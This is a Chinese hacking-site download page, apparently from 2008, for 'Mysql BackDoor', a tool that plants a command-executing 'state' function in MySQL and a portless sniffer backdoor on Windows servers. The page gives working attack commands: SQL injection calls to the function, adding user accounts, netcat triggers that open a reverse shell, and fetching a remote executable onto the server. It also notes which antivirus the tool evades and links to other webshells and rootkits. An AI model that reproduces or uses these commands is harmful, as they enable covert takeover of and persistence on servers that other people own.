首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全工具>后门程序>软件详细
软件名称:  Mysql BackDoorDoor
文件类型:  .rar
界面语言:  简体中文
软件类型:  国产软件
运行环境:  Win2003,WinXP,Win2000,Win9X
授权方式:  共享软件
软件大小:  160KB
软件等级:  ★★★★☆
发布时间:  2008-10-22
官方网址: http://hi.baidu.com/linx2008 作者:linx
演示网址: http://hi.baidu.com/linx2008
软件说明:  
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"



安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.

[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.



[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:

1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)

除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.


[卸载]
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。


详细用法看压缩包内图文说明。
http://blogimg.chinaunix.net/blog/upfile2/080712123321.rar

注意:能过杀毒软件,但过不了主动防御,主动防御太狠了,后门执行系统命令、发邮件、反向连接都会被发现。


发送Mysql-cmd c net user abc add,mysql backdoor运行cmd命令便会被主动防御截获:




发送Mysql-c-,mysql bookdoor运行管道重定向便会被主动防御截获,可见卡巴斯基监视了内存或句柄表:

下载地址: 进入下载地址列表
下载说明: ☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热门软件
·T00ls Lpk Sethc 首创lpk劫持方
·ASP+PHP两用Shell.rar
·PhpShell.php
·pam_backdoor.tar.gz
·bits.dll
·ASPXspy 2.0
·aspxspy.rar
·eeyebootroot.zip
·新型.net一句话webshell及客户端
·ZXshell2.0.rar
·NetCat_New_fixed_version.rar
·rknt.zip
  相关软件
·新型.net一句话webshell及客户端
·NtGodMode.exe
·aspxspy.rar
·sql_dir.rar
·ASP+PHP两用Shell.rar
·raptor_winudf.tgz
·ASPXspy 2.0
·eBayId.zip
·BDoor.rar
·uay_source.rar
·Mithril v1.45.rar
·rhtools.rar
 
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved